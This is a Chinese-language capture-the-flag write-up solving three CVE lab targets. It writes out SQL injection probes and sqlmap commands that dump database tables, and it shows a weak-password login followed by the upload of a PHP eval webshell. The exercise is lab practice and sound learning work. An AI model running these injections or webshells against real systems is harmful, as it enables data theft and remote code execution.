shuashuashua

CVE-2023-2130

靶标介绍:

在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

通过标靶介绍可以知道在/admin/suppliers/view_details.php页面存在参数id有sql注入漏洞,访问该页面

当参数id=1' and 1=1 --+时正确,id=1' and 1=2 --+时错误,说明存在sql注入漏洞。

抓包,把请求信息保存到5.txt文件中,sqlmap梭哈

sqlmap -r 5.txt --batch --dbs

sqlmap -r 5.txt --batch -D purchase_order_db --tables

sqlmap -r 5.txt --batch -D purchase_order_db -T fllllaaaag --columns

sqlmap -r 5.txt --batch -D purchase_order_db -T fllllaaaag -C flag --dump

得到flag

CVE-2023-1313

靶标介绍:

cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装

一个登录界面,他的提升通过/install来运行安装,访问/install,但是重定向到了原登录界面,dirsearch进行目录扫描,

可以看到存在该目录,但是不能够访问,尝试弱口令登录

admin / admin

成功登录进去,

找上传页面

上传一句话木马

<?php phpinfo();@eval($_POST['cmd']);?>

上传成功后下载,浏览后得到上传目录

访问该路径

可以看到配置文件界面,说明上传成功,连接蚁剑

CVE-2023-0562

靶标介绍:

银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

存在mysqli扩展,有数据库,可能存在sql注入,寻找注入点

在这个地方搜索会进行POST传参,然后重定向到该页面

抓包测试

把抓包的内容放到5.txt文件中

searchinput=* *会默认把该参数作为注入点

sqlmap -r 5.txt --batch --dbs

sqlmap -r 5.txt --batch -D blmsdb --tables

sqlmap -r 5.txt --batch -D blmsdb -T fllllaaaag --columns

sqlmap -r 5.txt --batch -D blmsdb -T fllllaaaag -C flag --dump

相关推荐
缘友一世2 小时前
网安系列【4】之OWASP与OWASP Top 10:Web安全入门指南
安全·web安全
HMS Core3 小时前
HarmonyOS免密认证方案 助力应用登录安全升级
安全·华为·harmonyos
Gauss松鼠会3 小时前
GaussDB权限管理:从RBAC到精细化控制的企业级安全实践
大数据·数据库·安全·database·gaussdb
小赖同学啊6 小时前
基于区块链的物联网(IoT)安全通信与数据共享的典型实例
物联网·安全·区块链
安全系统学习13 小时前
网络安全之SQL RCE漏洞
安全·web安全·网络安全·渗透测试
hanniuniu1319 小时前
AI时代API挑战加剧,API安全厂商F5护航企业数字未来
人工智能·安全
zhulangfly19 小时前
API接口安全-1:身份认证之传统Token VS JWT
安全
时时三省21 小时前
【时时三省】vectorcast使用教程
安全·安全架构
galaxylove21 小时前
Gartner发布最新指南:企业要构建防御性强且敏捷的网络安全计划以平衡安全保障与业务运营
网络·安全·web安全
PeterJXL1 天前
Chrome 下载文件时总是提示“已阻止不安全的下载”的解决方案
前端·chrome·安全